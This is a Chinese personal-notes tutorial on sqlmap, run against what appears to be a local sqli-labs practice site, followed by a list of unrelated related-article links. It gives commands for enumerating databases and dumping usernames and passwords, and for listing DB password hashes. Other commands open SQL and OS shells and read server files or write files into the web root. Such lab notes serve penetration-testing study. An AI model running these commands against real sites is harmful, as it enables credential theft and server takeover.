sqlmap 基本使用教程--个人笔记
sqlmap 基本使用教程--个人笔记
- 一、sqlmap获取目标方式
- 二、sqlmap测试命令举例:
- 网站使用GET请求方式
- 网站使用POST请求方式
- 用户权限
- 文件操作与shell提权
一、sqlmap获取目标方式
1、指定目标url
sqlmap -u http://www.sqllab.com/Less-5/?id=1
2、从文件中获取多个url
sqlmap -m test.txt
3、从文件中加载HTTP请求
sqlmap -r url.txt
4、从burp日志中获取目标
sqlmap -l burp.txt
二、sqlmap测试命令举例:
-batch: 自动答复和判断,默认输入 Y 来进行下一步操作。
-dump:拖库命令。
网站使用GET请求方式
1、查看数据库名
sqlmap -u http://www.sqllab.com/Less-5/?id=1 -dbs -batch
2、查看 security 数据库中的表名
sqlmap -u http://www.sqllab.com/Less-5/?id=1 -D security -tables -batch
3、查看 security 数据库中 users 表中的字段名
sqlmap -u http://www.sqllab.com/Less-5/?id=1 -D security -T users -columns -batch
4、查看 security 数据库中 users 表中的所有数据信息
sqlmap -u http://www.sqllab.com/Less-5/?id=1 -D security -T users -C id,username,password -dump -batch
网站使用POST请求方式
1、查看数据库名
sqlmap -u http://www.sqllab.com/Less-15/ -data="uname=1&passwd=1&submit=Submit" -dbs -batch
2、查看 security 数据库中的表名
sqlmap -u http://www.sqllab.com/Less-15/ -data="uname=1&passwd=1&submit=Submit" -D security -tables -batch
3、查看 security 数据库中 users 表中的字段名
sqlmap -u http://www.sqllab.com/Less-15/ -data="uname=1&passwd=1&submit=Submit" -D security -T users -columns -batch
4、查看 security 数据库中 users 表中的所有数据信息
sqlmap -u http://www.sqllab.com/Less-15/ -data="uname=1&passwd=1&submit=Submit" -D security -T users -C id,username,password -dump -batch
用户权限
1、列出数据库管理系统用户
sqlmap -u http://www.sqllab.com/Less-5/?id=1 -users
2、查看当前连接数据库用户
sqlmap -u http://www.sqllab.com/Less-5/?id=1 -current-user
3、查看数据库用户所有密码
sqlmap -u http://www.sqllab.com/Less-5/?id=1 -passwords
4、判断当前用户是否是DBA
sqlmap -u http://www.sqllab.com/Less-5/?id=1 --is-dba
5、查看用户权限
sqlmap -u http://www.sqllab.com/Less-5/?id=1 -privileges
文件操作与shell提权
1、sql shell
直接获取一个sql shell,直接执行 sql 语句进行交互。
sqlmap -u http://www.sqllab.com/Less-5/?id=1 -sql-shell
2、cmd shell
直接获取一个cmd shell,直接执行cmd命令进行交互。
sqlmap -u http://www.sqllab.com/Less-5/?id=1 --os-shell
3、读取服务器上指定文件
sqlmap -u http://www.sqllab.com/Less-5/?id=1 --file-read=C:/1.txt
4、写入本地文件到服务器上
注意:1、必须为dba权限;2、与 sqli-labs Less-7 原理相似
sqlmap -u http://www.sqllab.com/Less-5/?id=1 --file-write 1.txt --file-dest C:/phpstudy_pro/WWW/sqllab/1.txt
sqlmap 基本使用教程--个人笔记相关推荐
- linux磁盘符变化autofs,Linux基础教程学习笔记之Autofs自动挂载
Linux基础教程学习笔记之Autofs自动挂载 Autofs自动挂载: yum -y install autofs vim /etc/auto.master 在文件中添加下面行 /home/gue ...
- 网络存储 linux 访问,Linux基础教程学习笔记28——使用Samba访问网络存储
Linux基础教程学习笔记28--使用Samba访问网络存储 SMB用于Windows和类Linux系统直接的文件共享 安装samba client包: [root@linuxidc~]# yum i ...
- 《简明 Python 教程》笔记-----面向对象及系统相关
文档地址:http://sebug.net/paper/python/index.html <简明 Python 教程>笔记-----基础知识 1.类 ①.每个函数都有个self参数,代表 ...
- 无敌python爬虫教程学习笔记(一)
python爬虫系列文章目录 无敌python爬虫教程学习笔记(一) 无敌python爬虫教程学习笔记(二) 无敌python爬虫教程学习笔记(三) 无敌python爬虫教程学习笔记(四) 本文目录 ...
- 无敌python爬虫教程学习笔记(二)
系列文章目录 无敌python爬虫教程学习笔记(一) 无敌python爬虫教程学习笔记(二) 无敌python爬虫教程学习笔记(三) 无敌python爬虫教程学习笔记(四) 手刃一个小爬虫 系列文章目 ...
- 全网顶尖,毫不夸张的说这份斯坦福大学机器学习教程中文笔记,能让你机器学习从入门到精通
人工智能 人工智能,无疑是现在最火的概念,从AlphaGo打败李世石后,全世界掀起了一股人工智能的浪潮.我们在生活中的各个角落,都能感受到一个崭新的奇点时代即将来临 人工智能充气鞋垫 人工智能马桶 ( ...
- 黑马程序员最新版JavaWeb基础教程-学习笔记
da@黑马程序员最新版JavaWeb基础教程-学习笔记 day06-HTML&CSS HTML HTML(HyperTest Markup Language):超文本标记语言 是一门语言,所有 ...
- 【从零开始的大数据学习】Flink官方教程学习笔记(一)
Flink官方教程学习笔记 学习资源 基础Scala语法 Scala数据结构专题 声明变量 代码块 函数(function) 方法(methods) Traits (接口) class(类) tupl ...
- 《简明python教程》笔记一
读<简明Python教程>笔记: 本书的官方网站是www.byteofpython.info 安装就不说了,网上很多,这里就记录下我在安装时的问题,首先到python官网下载,选好安装路 ...
- 廖雪峰Git教程学习笔记
廖雪峰git简单教程学习笔记 教程地址:https://www.liaoxuefeng.com/wiki/0013739516305929606dd18361248578c67b8067c8c017b ...
最新文章
- Android开发学习——android体系结构
- python的算术运算符不包括_没有算术运算符的A + B,Python与C ++
- SQL(五) - 表的创建以及操作
- mysql outfile csv_sql-MySQL导出到outfile:CSV转义字符
- Javascript标准参考教程学习记录
- java 反编译修改软件名字_反编译APK更改文件的文字(修改应用名称)
- 计算机输入输出设计原则,交互设计精髓4中的104条设计原则
- WebCrack:一键自动化日站工具 ——yzddMr6
- oracle查询根据条件赋值,Oracle条件语句
- C语言4位BCD码加法器,四位二进制BCD码加法器.doc
- 【Python爬虫案例】批量采集网站壁纸,实现自动更换桌面壁纸
- 【python 库】 pandas 教程
- 微信定位和HTML5定位
- 如何使用ABP进行软件开发(2) 领域驱动设计和三层架构的对比
- 2009年20家年度失意大公司
- Windows Style Builder学习制作笔记 - 任务栏篇(三)
- Photo Album: 2008年6月泰康路田子坊-时尚与世俗并存
- 【转载】SAP ECC v.s S4 功能差异
- Swagger接口在线文档
- 运用计算机技术创设英语课堂问题场,信息技术在小学英语课堂中的应用